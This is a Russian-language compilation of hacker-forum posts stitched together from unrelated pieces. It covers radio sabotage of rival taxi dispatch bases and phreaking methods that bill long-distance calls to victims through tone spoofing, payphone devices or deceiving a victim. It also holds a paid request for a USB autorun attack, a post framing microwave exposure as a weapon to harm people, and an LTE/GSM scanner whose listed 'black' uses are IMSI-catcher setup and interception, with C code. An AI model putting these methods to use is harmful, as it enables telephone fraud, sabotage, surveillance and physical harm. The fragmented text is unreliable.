По телефонному каналу может осуществляться введение на базу ложных заказов, информации о непредвиденных ситуациях и опасностях, однако используя телефонный канал следует соблюдать меры предосторожности, т.к. на большинстве таксобаз стоят АОНы, таким образом следует звонить с чужого номера ("доброго" дяди (тети)) или на худой конец таксофона.
По радио наиболее увлекательным мероприятием является регистрация несуществующих мобильных абонентов, очень хорошо действует на больших вражеских базах с плохим учетом. В данном случае хорошую помощь оказывает наблюдение за работой врагов и аналих проходящей у них информации. Хорошо получается при наличии СВ станций, лючше портативок, разводить можно с любого места (желательно подальше от представителей подвижного состава, иначе результаты могут оказаться плачевными) главное чтобы слышала база, желательно не очень хорошо. Такое мероприятие увеличивает нервозность в работе диспечеров, приводит к потере клиентов, иногда удается по проходу.
- При наличии двух и более конкурирующих вражеских баз возможно разжигание войны между ними. В данном случае наиболее предпочтительно использование портативных станций и передача информации с их помощью из мест находящихся вблизи мест скопления конкурентов. Желательно тщательная работа с модуляцией и наблюдение за ведением радиообмена врагов, для подражания их манере общения.
При использовании звукозаписывающей аппаратуры возможна ретрансляция угроз, ругательств на частоте конкурента возникающих при различных методах воздействия, а при наличии копьютера возможен монтаж сообщений диспечера и представителей подвижного состава, что вносит еще большую дезорганизацию в работу вражеской базы.
При воздействии на вражескую базу по проходу наиболее полезно длительное обсуждение личных качеств диспечеров и наиболее громко слышимых представителей подвижного состава. Хорошие результаты при достаточной мощности передатчика и эффективных антеннах, нервы диспечера выдерживают не более 10-15 минут.

Скоро может еще допишу, посколько тексту уже 2 года, есть новые наработки, но нет времени их описывать

Как нахаляву потрепаться по межгороду ? Для начала надо сэмулировать выход на междугородную линию (проще говоря создать wav-файл в специализированной для этого проге). Делается это прогой SoundForge, которая очень часто появляется на пиратских дисках или в сети. С помощью нее можно сделать много гадостей, таких как разоеденение того, у кого занято, прослушивание чужого разговора и пр. о чем я расскажу в следующий раз. А пока про то, как наваять сигнал выхода на городскую линию от чужого ника В настройках SoundForge ставим следующее: в меню DTMF,MF (tools->syntethesis) ставим сигнал MF, длинна которого 0,04, pause и прерывание его каждые 0,001. Строка набора (dial string) должна содердать 1*******, где вместо звезд надо указать тот номер, с которого ты будешь якобы звонить задом наперед. То есть был 2763102, а стал 12013672 (это телевон того ублюдка, которого зовут Глеб). Если цифра повторяется дважды, то ту из них которая идет сначало, надо заменять на B (там шестнадцатеричная система). То есть был 9110203, а стал 13020B19. Теперь звук полностью сгенерирован. Осталось самое сложное: запихнуть это дело в линию. Тут есть два варианта. Нучну с первого, который использую я. Я свинчиваю микрофон с труюки у телефона, подключаю к нему провода, идущие от мамки на спикер (их два), поднимаю трубку и включаю этот звук. Прослушать звук на спикере можно просто прослушав его в Norton Commander'е (и других шеллах для ДОСа, которые поддерживают прослушивание низкочастотных wav-файлов). Второй способ для тех, кто очень здорово разбирается в модемах. Надо достать провод, который с обоих концов одинаковый и подходит в разъемы для микрофона, колонок и т. д. Такой можно сделать и самому, только вначале надо посмотреть что бы все контакты соответствовали (можно посмотреть проходит электричество или нет лампочкой. Можно и языком но я этого не советую, т. к. контакты окисляются, хоть этого не заметно, но процент удачи становится ниже). Один конец всовываешь в разьем звуковой карточки для колонок, а второйв разъем на модеме для микрофона. Так вот челу, который круто разбирается в модемах, надо заставить модем включить микрофон и поднять трубку, и тогда уже прослушать wav-файл. Хотя, особо крутых знантий не нужно, если Ты пользуешься модемами фирмы hayes, они постоянно на линии и микрофон у них постоянно включен. По крайней мере у старых моделей. Теперь можно нахаляву болтать по межгороду, хотя Тебя на этом могут зажопить, ведь узнать откуда реально был сделан звонок - не проблема. Есть еще вариант, что бы самому собрать устройство, которое находится на линии и посылает в нее звуки, такое сделать не сложно по идее. У меня есть. Там провода какие-то намотаны и пара таких кругло-плоских хреновин Есть еще более легкий вариант как сгенерить этот wav-файл. Береш любую прогу для написания midi-композиций, и пишешь произведение из одной только чистой- чистой (все эффекты убрать!) ноты "Ля" первой (основной) октавы. Закидывать его на линию надо таким же способом, вот только со спикером и трубкой телефона обламывается - midi не прослушивается спикером (ну только если Ты угробишь все свои дайвера от SoundBlaster'а и поставишь как основное воспроизводящее устройство - спикер ака внутренний динамик).

По окончании набоpа абонентом cобcтвенного номеpа РCЛА-МИР ( Реле cоеденительных линий автоматики и междугоpодных иcхолящих pегиcтpов) чеpез cоеденитель C подключаетcя к общему пpовеpоччному уcтpойcтву ОПУ. В cоcтав ОПУ входит генеpатоp и пpиемник тональной чаcтоты 1600 Гц. Пеpеменный ток 1600гц поcылаетcя от генеpатоpа по шлейфу чеpез пpибоpы заказно-cоеденительной линии и пpинимаютcя пpиемником. В завиcимоcти от pезультатов пpовеpки, был или не был замкнут пpовеpяемый шлейф, ОПУ пеpедает в РCЛА-МИР cоответcтвующий cигнал и оcвобождаетcя.

Для тех, кто не понял: после набора абонентом своего номера, АТС соединяется через исходящий комплект соединительных линий с заданным номером, подключаясь к абоненту. По входящей линии (той, на которой висит абонент, набравший номер) посылается частота 1600 Гц, а приемник ждет ее (с точностью до 50 Гц), подключившись к исходящей линии, причем очень непродолжительное время.
Если набрать чужой номер, то, очевидно, приемник обычно ничего не услышит.
Как это обмануть ? А есть шесть способов:
1. (самый глупый) найта таксофон с городским номером, с которого есть выход на эту станцию (категории-то кривые на таксофоны ставили, а вот про 7 все давно забыли). Использовался преимущественно в летнее время.
2. (тоже глупый, но изощренее). Требуется: электронщик - 1 шт, паяльник - 1 шт, радиодетали - много штук. Изготавливается Shit Box - генератор частоты 1600 Гц, снимающий трубку при вызывном сигнале и отвечающий в течении 1 минуты. Вешается на любой таксофон с городским номером. После этого смело звоните по этому номеру, а когда автоответчик запищит, вещаете трубку и набираете номер этого таксофона вместо своего. АТС ответ услышит, гарантирую Правда телефонисты навострились их находить и снимать.
3. (самый дебильный и ненадежный, вызывает претензии со стороны работников АМТС, иногда в грубой форме). В недалекие времена 3 и 4 миллионные зоны в Питере были одним и тем же (большинство АТС не различали первые цифры 3 и 4). Таким образом, станция 315 были и 415. Поэтому, абонент 315 станции, набирая свой номер, мог набрать 415, и проба прошла бы нормально. Hо 415 станции в городе нет, поэтому счета бы копились в окрестностях мусорного ведра, вызывая озабоченность у работников ВЦ, которые будут звонить на 415 станцию (и попадут ведь) и узнавать, что это за АТС. Правда теперь ситуация с 3 и 4 изменилась. При желании в номере можно было поменять не только первую цифру, но и пятую (для абонентов блокированных телефонов), при этом счет уходил соседу. Для тех, кому особенно повезло с телефоном, можно было поменять даже 3 цифры: можно было набирать как 47x, так и 48x (и 38x), попадая на одну и ту же станцию.
4. (очень красивый, требует некоторых капвложений, порядка $500). За $500 устанавливаете себе второй телефонный номер (можно даже Петерстар), доступ с которого к старой станции не нужен. Выбираете жертву (на языке бандитв - терпила), которая доверчиво снимает трубку и долго не кладет ее (например, автоответчик, лучше - станционный, АОH, лучше, чтобы он не определил номер, или модем). По второй линии набираем номер жертвы и ждем, пока она снимет трубку, если это человек, то уговаривам его не вешать трубку, т.к. идет проверка его телефонной линии. В это время набираем по первой линии межгород, потом набираем номер жертвы и оперативно прикладиваем динамик телефона на первой линии к микрофону второй. Станция подключается в линии жертвы и слышит там частоту, которая посылается по вашей второй линии. Иногда невредно подключить между микрофоном и динамиком усилитель, или просто поставить на вторую линию генератор.
5. (самый простой и удобный). Очень похож на способ 2. Основан на том, что в каждом городе стоят тысячи или десятки тысяч автоответчиков с частотой 1600 Гц. Hазывается этот автоответчик - FAX! Hа самом деле, частота его несущей другая, но когда вы вешаете трубку, позвонив на факс, короткие гудки, смешиваясь с несущей, дают смесь частот, принимаемую станцией за 1600 Гц.
6. (еще более простой). Любая комбинация из вышеперечисленных, например - позвонить из будки, списав звонок на жертву с факсом, изменив ее номер.
P.S. Современные станции обманываются гораздо большим числом способов
P.P.S. Если хотите сделать другу пакость, наберите его номер в конце и не вешайте трубку на своем телефоне - телефон друга (как, впрочем, и ваш) работаь не будет. Действует не всегда и не везде.

довольно часто возникают подобные вопросы, а теперь я и сам призадумался
каким девайсом можно определить, что смартфон в данный конкретный момент ведёт передачу данных? в идеале девайс должен уметь писать лог активности, чтобы можно было положить его рядом с якобы выключенным смартфоном и заниматься своими делами, а через какое-то время посмотреть, была ли активность.
я правильно понимаю, что китайские "детекторы жучков" с Горбушки - это хлам, и нужно покупать бэушный радиосканер Tektronix за миллион долларов? или будет достаточно обычного HackRF?

ping gliderexpert Veil jeki

если я всё правильно понял, то будет достаточно HackRF, так как оно поддерживает все нужные частоты. но надо будет подключить к нему одновременно три антенны? (для 600-900 МГц, 1700-2400 МГц, и 2400-3000 МГц)

Есть wi-fi адаптер Alfa AWUS1900, подскажите какая антенна 2400 мГц для него лучше всего подойдёт и как правильно её подключить для максимально сильного приёма и передачи сигнала, ведь у этого адаптера 4 разъема, а у подобных антенн 1 или 2.

Стоит ли 2 такие антенны ставить (по 2 разъема с каждой на один 4х разъемный адаптер) или они будут друг другу мешать?
Цель использования - подключение к wifi роутеру на растоянии 100-200 метров.

знакома ли общественность с таким вот девайсом?

я не про трактор.

чуваки сконструировали устройство для взлома и реверс-инжиниринга чипов стоимостью всего в 500$.

Два белых хакера Сэм Бомонт и Ларри «Патч» Троуэлл, работающих в компании «NetSPI», представили недорогое устройство «RayV Lite» для аппаратного взлома чипов с помощью лазеров. Вкратце, «RayV Lite» — это попытка создать бюджетный вариант сверхдорогих лазерных инструментов спецслужб для взлома и реверс- инжиниринга чипов. И эта попытка удалась.

По словам разработчиков, с помощью «RayV Lite» с открытым кодом лазерный (оптический) взлом чипов сможет совершать широкий круг специалистов и любителей. Стоимость профессионального оборудования для подобных целей достигает $150 тыс., тогда как Бомонт и Троуэлл уложились в бюджет всего лишь $500.

По их словам, это «одомашнивание» хакерских инструментов, что позволит, как они надеются, усилить защиту от подобных методов взлома, к которому сегодня подавляющее число разработчиков чипов относятся с безразличием.

Задумал я подойти к радио######ганам на 3 МГц с помощью СВ радиостанции (27 МГц). По приему это сделать довольно просто, можно использовать практически стандартную схему включения К174ПС1 с частотой переноса 24 МГЦ и их отлично слышно (проверял работает). А вот с передачей дело обстоит сложнее. Если пытаться то же использовать на передачу, т.е. сформированый АМ сиглал проталкивать через ПС1, то получается паршиво, приходится модулировать в выходном каскаде передатчика.
Может кто сталкивался с подобной проблемой и подскажет какую-нибудь умную идею.

Подскажите мануал или хотя бы куда копать...
Ищу способ автозагрузки и автовыполнения .bat или .exe файла в windows 10/11 при подключении usb флешки. Подскажите какие есть способы создания загрузочной флешки!
Хотел бы предложить обсудить тему подобной атаки, надеюсь найти помощь среди вас. За рабочий вариант + в карму и с радостью накину 10$. Даст Бог подниму с ворка, буду рад еще поделиться

Представляю вниманию известную в узких кругах книгу времен СССР, в которой приведена подробная систематизированная информация о воздействии СВЧ-излучения на живые организмы.
Что немаловажно - это не данные, полученные модными сейчас методиками цифрового моделирования - а суровые логи не менее суровых физических экспериментов.
Да - да, тот самый метод терморектального анализа - грели собачек-крысок СВЧ "печкой" и измеряли результаты термометром, вставленным в jtag порт крыски
Тут нет размышлений любителей смузи на тему вреда мобильных телефонов и мерцания мониторов. Только хардкор:

Как применять на практике? Нелетальное электронное оружие. Социнженерия. Используя СВЧ генератор с определенными параметрами, можно весьма не иллюзорно сводить человека с ума или пошатнуть ему здоровье.
Например, утверждается что у человека можно выработать условный рефлекс на включение радиопередатчика довольно малой мощности:

В общем - экспериментируйте, и просвящайте население СВЧ-волнами благодати ))
http://damaga377vyvydeqeuigxvl6g5sbmipoxb5nne6gpj3sisbnslbhvrqd.onion/b/6ggMtQvOTaQIT4oPpZSXGs

Сканер LTE/UMTS/GSM

​

Что это такое?
Компактный прибор, позволяющий получать информацию о ближайших базовых станциях сотовой связи:

• частота и канал связи (arfcn)
• идентификаторы базовой станции - CellId, Location AreaCode, PCI,...
• служебную информацию - CellReselection Offset, Hysteresis, RXlam,...
• в 2G - списки соседних станций (neighbour cell list)

Полученные данные можно записать в логфайл для последующего просмотра на персональном компьютере, либо обрабатывать в реальном времени.

Зачем это нужно?

" Белое" применение:

• исследование покрытия сотовой сети. Выявление "проблемных" зон с низким уровнем сигнала или "перекрывающимися" секторами сот. Бюджетный аналог систем ROMES, TEMS, NEMO и др.
• определение соты и оператора с наиболее сильным сигналом - для монтажа "сотового интернета на даче", выбора правильного тарифного плана, определение направления на ближайшую базовую станцию
• измерение уровня сигнала при наведении/юстировки антенны модема (см предыдущий пункт)

" Серое" применение:

• Обнаружение IMSI-Catcher'ов. Поиск "мест обитания" стационарных IMSI-Catcher'ов
• Если Вы обнаруживаете IMSI Catcher рядом со своим домом или местом работы - знайте, что за вами следят или хотят подставить, и это совсем уже не параноя
• Радио-разведка, построение актуальной карты расположения вышек сотовой сети для последующего использования данной информации в целях геолокации при подавлении GPS

" Черное" применение:

• выдача частот для настройки редиректора LTE->2G
• выдача частот, коэффициентов и "цветов" БС для настройки 2G BTS
• выдача частот для работы пассивного комплекса перехвата моб.связи
• CatchInRide - непрерывное сканирование сети и перестройка параметров IMSI Cather'а "на ходу" для возможности работы в движении

Чем это лучше телефона?
Конечно, существуют специальные модифицированные (как программно, так и иногда-аппаратно) телефоны, позволяющие показывать списки сот. Нельзя сказать что лучше или хуже.

Телефон ​+ Компактность. Можно носить всегда с собой.
+ Не привлекает внимание
+ Цена "железа", доступность| ДЕВАЙС ​+ Работает на всех частотных диапазонах. Легко добавить нужные Band'ы при необходимости.
+ Простота управления внешними устройствами, большой набор интерфейсов
+ opensource, позволяющий модернизировать функционал
---|---

Реализованные функции на данный момент времени
- скан LTE сети в диапазонах B1/B2/B3/B5/B7/B8/B20/B28A/B38/B40/B41
- скан 3G в диапазонах B1/B2/B5/B8
- запись полученных данных в JSON лог
- отображает статус сканирования на LCD индикаторе

Записываемые параметры по каждой из обнаруженных сот:
- тип соты 3g/4g, MCC, MNC, ARFCN, TAC, PCI, RSSI, LAC, CID, PSC, RSCP, ECIO

Планы на ближайший месяц. Над чем работаю сейчас:

• парсинг и запись GPS координаты точки измерения.
• интерфейс для визуализации измерений
• "железо" модуля измерения параметров 2G сети

Над чем буду работать после завершения этих этапов

• программный модуль скана 2g сети
• интерактивное меню-управление с кнопочек на передней панели

Как помочь проекту?
- Морально. Распространите ссылку на статью по знакомым и медиа-ресурсам. Энтузиазм победить нельзя, но в рф он сам погаснет! Поэтому приоритет на зарубежные площадки. Кто есть на ру-ресурсах типа vrtp, фрикера и так далее - да будет спам! ) Репост + ссылка на эту тему.

- Материально. Все средства зачисленные на BTC адрес пойдут только на этот проект.
Если желающие поддержать не только словом, но и делом - найдутся - с меня отчет в этой теме, в формате хеш транзакции - на что конкретно была потрачена. Скидывайте ник и хеш транзакции, добавлю в список соучастников проекта! )
BTC кошелек проекта: **bc1qrj2mk5m5jaxzee8vq625ec8tdusettpzrevk3q

- Технически.** Приветствуются любые дополнения и участие в проекте - пишем код вместе и улучшаем возможности девайса. Код-ревью и "причесывание" исходников. Основной язык проекта - C. Обновления и дополнения обсуждаем в этой теме. Хорошие правки, дополнения - будут внесены в основной код с указанием авторов, после проверки мною "в железе". Можете делать свои "форки" сколько угодно, перезаливы на гитхаб - приветствуются с обязательным указанием ссылки на эту тему.

Лицензии и копирайты
Автор идеи проекта и первоначального кода - я.
Железо - Opensource, на стандартных общедоступных модулях.
Софт - Opensource, загружается в устройство самостоятельно
Ограничения на распространение и применение - отсутствуют. Обязательная ссылка на " xss.is " .
Техподдержка - на все вопросы Вам обязательно ответит ChatGPT.

Это сообщение будет дополняться информацией по мере развития проекта.

Spoiler: ЖЕЛЕЗО

Список комплектующих ТУТ.

Пока кратко. За более подробным описанием и картинками заходите позже.
Платформа - одноплатный ПК Orange PI RK3399.
Для сканирования LTE используются 2 модема - Quectel EC25-EUX и Huawei ME909s-120
Huawei подключен в m2 разъем, Quectel - через usb-to-m2 адаптер.
Дисплей - знакосинтезирующий, фирмы Мелт, 20 символов 2 строки
Питание хуавея и дисплея - через отдельный dc/dc преобразователь с выходом 5 вольт
Enable преобразователя заведен на GPIO для возможности аппаратного ресета Quectel'а
Питание - LiPo авиамодельный аккумулятор 3S емкостью 3300мА/ч

Spoiler: Пример результата сканирования сети + приз

Определи геолокацию с точностью до улицы, на которой был записан этот лог - и получи кучу лайков )

JSON:Copy to clipboard

{
"cell": [
{
 "type":"4G",
 "MCC":"250",
 "MNC":"20",
 "ARFCN":"100",
 "TAC":"195",
 "PCI":"0",
 "RSSI":"-44"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"01",
 "ARFCN":"1802",
 "TAC":"18A",
 "PCI":"0",
 "RSSI":"-41"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"01",
 "ARFCN":"3200",
 "TAC":"67",
 "PCI":"0",
 "RSSI":"-40"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"02",
 "ARFCN":"6350",
 "TAC":"13D",
 "PCI":"0",
 "RSSI":"-24"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"01",
 "ARFCN":"38100",
 "TAC":"108",
 "PCI":"0",
 "RSSI":"-74"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"20",
 "ARFCN":"38950",
 "TAC":"1D9",
 "PCI":"0",
 "RSSI":"-41"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"01",
 "ARFCN":"40740",
 "TAC":"108",
 "PCI":"0",
 "RSSI":"-70"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"20",
 "ARFCN":"3400",
 "TAC":"9D",
 "PCI":"0",
 "RSSI":"-48"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"99",
 "ARFCN":"1301",
 "TAC":"4C",
 "PCI":"0",
 "RSSI":"-41"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"01",
 "ARFCN":"375",
 "TAC":"DC",
 "PCI":"0",
 "RSSI":"-43"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"99",
 "ARFCN":"3300",
 "TAC":"B1",
 "PCI":"0",
 "RSSI":"-43"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"20",
 "ARFCN":"39550",
 "TAC":"8C",
 "PCI":"0",
 "RSSI":"-47"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"02",
 "ARFCN":"2850",
 "TAC":"2",
 "PCI":"0",
 "RSSI":"-51"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"02",
 "ARFCN":"1602",
 "TAC":"22",
 "PCI":"0",
 "RSSI":"-62"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"99",
 "ARFCN":"6413",
 "TAC":"177",
 "PCI":"0",
 "RSSI":"-65"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"99",
 "ARFCN":"525",
 "TAC":"F2",
 "PCI":"0",
 "RSSI":"-57"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"20",
 "ARFCN":"75",
 "TAC":"E3",
 "PCI":"0",
 "RSSI":"-36"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"20",
 "ARFCN":"6200",
 "TAC":"6CAD",
 "PCI":"188",
 "RSSI":"-58"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"02",
 "ARFCN":"3048",
 "TAC":"2606",
 "PCI":"34",
 "RSSI":"-75"
},
{
 "type":"4G",
 "MCC":"250",
 "MNC":"02",
 "ARFCN":"6338",
 "TAC":"1E35",
 "PCI":"54",
 "RSSI":"-87"
},
{
 "type":"3G",
 "MCC":"250",
 "MNC":"02",
 "ARFCN":"10687",
 "LAC":"25F4",
 "CID":"A1B44C",
 "PSC":"405",
 "RSCP":"0",
 "ECIO":"0"
},
{
 "type":"3G",
 "MCC":"250",
 "MNC":"02",
 "ARFCN":"2938",
 "LAC":"25F4",
 "CID":"A1B421",
 "PSC":"12",
 "RSCP":"-53",
 "ECIO":"-3"
},
{
 "type":"3G",
 "MCC":"250",
 "MNC":"20",
 "ARFCN":"10563",
 "LAC":"6CAD",
 "CID":"742E89",
 "PSC":"326",
 "RSCP":"-56",
 "ECIO":"-12"
},
{
 "type":"3G",
 "MCC":"250",
 "MNC":"02",
 "ARFCN":"10662",
 "LAC":"25F4",
 "CID":"A1B44E",
 "PSC":"405",
 "RSCP":"-58",
 "ECIO":"-11"
},
{
 "type":"3G",
 "MCC":"250",
 "MNC":"99",
 "ARFCN":"3036",
 "LAC":"7005",
 "CID":"1F390A1",
 "PSC":"378",
 "RSCP":"-54",
 "ECIO":"0"
},
{
 "type":"3G",
 "MCC":"250",
 "MNC":"01",
 "ARFCN":"2987",
 "LAC":"18BA",
 "CID":"330D101",
 "PSC":"411",
 "RSCP":"-71",
 "ECIO":"0"
},
{
 "type":"3G",
 "MCC":"250",
 "MNC":"02",
 "ARFCN":"10638",
 "LAC":"25F4",
 "CID":"A19C99",
 "PSC":"217",
 "RSCP":"-93",
 "ECIO":"0"
},
{
 "type":"3G",
 "MCC":"250",
 "MNC":"01",
 "ARFCN":"10762",
 "LAC":"18D8",
 "CID":"3306CC2",
 "PSC":"421",
 "RSCP":"-76",
 "ECIO":"0"
}]
}

Spoiler: КОД

main.c

C:Copy to clipboard

#include "header.h"
#include <pthread.h>


char dir_name[150]={};
int max_dir=0;
char file_name[150]={};
FILE *fp = NULL;

long lcd_start_time =0;
long lcd_cur_time =0;
long lcd_delta_time=0;
time_t lcd_seconds;


extern char umts_count;
extern char lte_count;


extern char umts_count_huawei;
extern char lte_count_huawei;


extern LTE_Cell lte_list[];
extern LTE_Cell lte_list_huawei[];


extern UMTS_Cell umts_list_huawei[];

extern UMTS_Cell umts_list[];

char umts_count_old =0;//for detecting new cells
char lte_count_old=0;//for detecting new cells

extern char umts_count_huawei_old=0;
extern char lte_count_huawei_old=0;


int plmn_arr[MAX_CELL][MAX_CELL] = {};


char buffer[1256]={};
char tx_string[256]={};

int fd;





void quectel_reset()
{
    char in_c=0;
    quectel_close();


    sleep(5);


    pinMode (19,OUTPUT);
    digitalWrite(19,1);
    sleep(10);



    pinMode (19,OUTPUT);
    digitalWrite(19,0);



    lcdClear(fd);
    lcdPosition(fd,0,0);
    lcdPuts(fd,"BASEBAND RESET");
    lcdPosition(fd,0,1);
    lcdPuts(fd,"PLEASE WAIT...");

        printf("bb reset \n");

    sleep(20);

    in_c = quectel_start();

    qualcom_imei();
    sleep(5);

}


void huawei_reset(){
    memset(tx_string,0,sizeof(tx_string));
    sprintf(tx_string,"AT+CFUN=0 \r");
    huawei_println(tx_string, sizeof(tx_string));
    memset(buffer,0,sizeof(buffer));

        while (1)
        {
        huawei_readln(buffer);

        if (strstr(buffer, "OK") ){
            printf("huawei power off ok  %s \n",buffer);
            break;
        }

        if (strstr(buffer, "ERROR") ){

                printf("at command error,retry \n");
                memset(tx_string,0,sizeof(tx_string));
                sprintf(tx_string,"AT+CFUN=0 \r");
                    huawei_println(tx_string, sizeof(tx_string));
            }

        memset(buffer,0,sizeof(buffer));
        }

        memset(buffer,0,sizeof(buffer));




        memset(tx_string,0,sizeof(tx_string));
        sprintf(tx_string,"AT+CFUN=1 \r");

                huawei_println(tx_string, sizeof(tx_string));


                while (1)
                {
                huawei_readln(buffer);

                if (strstr(buffer, "OK") ){
                    printf("huawei power on ok  %s \n",buffer);
                    break;
                }

                if (strstr(buffer, "ERROR") ){

                        printf("at command error,retry \n");
                        memset(tx_string,0,sizeof(tx_string));
                        sprintf(tx_string,"AT+CFUN=1 \r");
                        huawei_println(tx_string, sizeof(tx_string));
                    }

                memset(buffer,0,sizeof(buffer));
                }

                memset(buffer,0,sizeof(buffer));




                memset(tx_string,0,sizeof(tx_string));
                sprintf(tx_string,"AT^CURC=0 \r");
                huawei_println(tx_string, sizeof(tx_string));

                while (1)
                    {
                                huawei_readln(buffer);


                    if (strstr(buffer, "OK") ){
                    break;
                    }
                    memset(buffer,0,sizeof(buffer));
                    }

                memset(buffer,0,sizeof(buffer));


}



void merge_arrays()
{

int mcc = 0;
int mnc=0;

int lcd_merge_4g=0;
int lcd_merge_3g=0;

int merge_cnt=0;

int merge1_cnt=0;
int merge2_cnt=0;
for (merge_cnt=0;merge_cnt<MAX_CELL;merge_cnt++)
    {
        if (lte_list[merge_cnt].arfcn !=0 )
            {


                for (merge1_cnt=0;merge1_cnt<MAX_CELL;merge1_cnt++)
                    {
                        if ( (lte_list_huawei[merge1_cnt].arfcn == lte_list[merge_cnt].arfcn) &&(lte_list_huawei[merge1_cnt].plmn != lte_list[merge_cnt].plmn) )
                            {
                                merge2_cnt = 0;
                                while (merge2_cnt<MAX_CELL)
                                    {
                                        if ((plmn_arr[merge2_cnt][0]==lte_list[merge_cnt].plmn )||(plmn_arr[merge2_cnt][0]==0)) break;
                                        merge2_cnt++;
                                    }

                                    if  (plmn_arr[merge2_cnt][0]!=lte_list[merge_cnt].plmn){
                                        plmn_arr[merge2_cnt][0]=lte_list[merge_cnt].plmn;
                                        plmn_arr[merge2_cnt][1]=lte_list_huawei[merge1_cnt].plmn;
                                    }

                            }
                    }


            }

    }


for (merge_cnt=0;merge_cnt<MAX_CELL;merge_cnt++)
{

    if (plmn_arr[merge_cnt][0] !=0)
    {
        for (merge1_cnt=0;merge1_cnt<MAX_CELL;merge1_cnt++)
        {
            if (plmn_arr[merge_cnt][0] == lte_list[merge1_cnt].plmn) lte_list[merge1_cnt].plmn =plmn_arr[merge_cnt][1];
        }
    }
}



for (merge2_cnt=0;merge2_cnt<MAX_CELL;merge2_cnt++){
merge_cnt=0;
while (merge_cnt<MAX_CELL){
    if (lte_list[merge_cnt].arfcn == 0 || (lte_list[merge_cnt].arfcn == lte_list_huawei[merge2_cnt].arfcn )) break;
    merge_cnt++;
}


if (lte_list[merge_cnt].arfcn != lte_list_huawei[merge2_cnt].arfcn)
        {

            lte_list[merge_cnt].arfcn = lte_list_huawei[merge2_cnt].arfcn;
            lte_list[merge_cnt].plmn = lte_list_huawei[merge2_cnt].plmn;
            lte_list[merge_cnt].pci = lte_list_huawei[merge2_cnt].pci;
            memcpy(lte_list[merge_cnt].tac, lte_list_huawei[merge2_cnt].tac, sizeof lte_list_huawei[merge2_cnt].tac);
            lte_list[merge_cnt].rssi = lte_list_huawei[merge2_cnt].rssi;
        }

}

printf("################## LTE CELL LIST ################## \n");


char firstrun=1;

for (merge_cnt=0;merge_cnt<MAX_CELL;merge_cnt++)
{
    if (lte_list[merge_cnt].arfcn !=0)
    {
           printf ("plmn = %d  arfcn = %d channel = %s tac=%s pci= %d rssi=%d  \n",lte_list[merge_cnt].plmn, lte_list[merge_cnt].arfcn, lte_list[merge_cnt].channel,lte_list[merge_cnt].tac,lte_list[merge_cnt].pci,lte_list[merge_cnt].rssi);
           lcd_merge_4g ++;

           mcc = lte_list[merge_cnt].plmn / 100;
               mnc =lte_list[merge_cnt].plmn %100;

               if(firstrun)
               {
                   firstrun=0;
               }else
               {
                   fprintf(fp,",\n");
               }

               fprintf(fp,"{\n");
               fprintf(fp," \"type\":\"4G\",\n");
               fprintf(fp," \"MCC\":\"%d\",\n",mcc);
               fprintf(fp," \"MNC\":\"%02d\",\n",mnc);
               fprintf(fp," \"ARFCN\":\"%d\",\n",lte_list[merge_cnt].arfcn);
               fprintf(fp," \"TAC\":\"%s\",\n",lte_list[merge_cnt].tac);
               fprintf(fp," \"PCI\":\"%d\",\n",lte_list[merge_cnt].pci);
               fprintf(fp," \"RSSI\":\"%d\"\n",lte_list[merge_cnt].rssi);
               fprintf(fp,"}");
               fflush(fp);


    }
}



////////////////////////////////////////////////
for (merge2_cnt=0;merge2_cnt<MAX_CELL;merge2_cnt++){
merge_cnt=0;
while (merge_cnt<MAX_CELL){
    if (umts_list[merge_cnt].arfcn == 0 || (umts_list[merge_cnt].arfcn == umts_list_huawei[merge2_cnt].arfcn )) break;
    merge_cnt++;
}


if (umts_list[merge_cnt].arfcn != umts_list_huawei[merge2_cnt].arfcn)
        {

            umts_list[merge_cnt].arfcn = umts_list_huawei[merge2_cnt].arfcn;
            umts_list[merge_cnt].plmn = umts_list_huawei[merge2_cnt].plmn;

            memcpy(umts_list[merge_cnt].lac, umts_list_huawei[merge2_cnt].lac, sizeof umts_list_huawei[merge2_cnt].lac);
            memcpy(umts_list[merge_cnt].cid, umts_list_huawei[merge2_cnt].cid, sizeof umts_list_huawei[merge2_cnt].cid);

            umts_list[merge_cnt].psc = umts_list_huawei[merge2_cnt].psc;
            umts_list[merge_cnt].rscp = umts_list_huawei[merge2_cnt].rscp;
            umts_list[merge_cnt].ecio = umts_list_huawei[merge2_cnt].ecio;

        }

}



printf("################## UMTS CELL LIST ################## \n");

for (merge_cnt=0;merge_cnt<MAX_CELL;merge_cnt++)
{
    if (umts_list[merge_cnt].arfcn !=0)
    {
           printf ("plmn = %d  arfcn = %d lac=%s cid=%s psc=%d rscp= %d ecio=%d \n",umts_list[merge_cnt].plmn, umts_list[merge_cnt].arfcn,umts_list[merge_cnt].lac,umts_list[merge_cnt].cid,umts_list[merge_cnt].psc,umts_list[merge_cnt].rscp,umts_list[merge_cnt].ecio);
           lcd_merge_3g ++;

           mcc = umts_list[merge_cnt].plmn / 100;
           mnc =umts_list[merge_cnt].plmn %100;

           fprintf(fp,",\n{\n");
           fprintf(fp," \"type\":\"3G\",\n");
           fprintf(fp," \"MCC\":\"%d\",\n",mcc);
           fprintf(fp," \"MNC\":\"%02d\",\n",mnc);
           fprintf(fp," \"ARFCN\":\"%d\",\n",umts_list[merge_cnt].arfcn);
           fprintf(fp," \"LAC\":\"%s\",\n",umts_list[merge_cnt].lac);
           fprintf(fp," \"CID\":\"%s\",\n",umts_list[merge_cnt].cid);
           fprintf(fp," \"PSC\":\"%d\",\n",umts_list[merge_cnt].psc);
           fprintf(fp," \"RSCP\":\"%d\",\n",umts_list[merge_cnt].rscp);
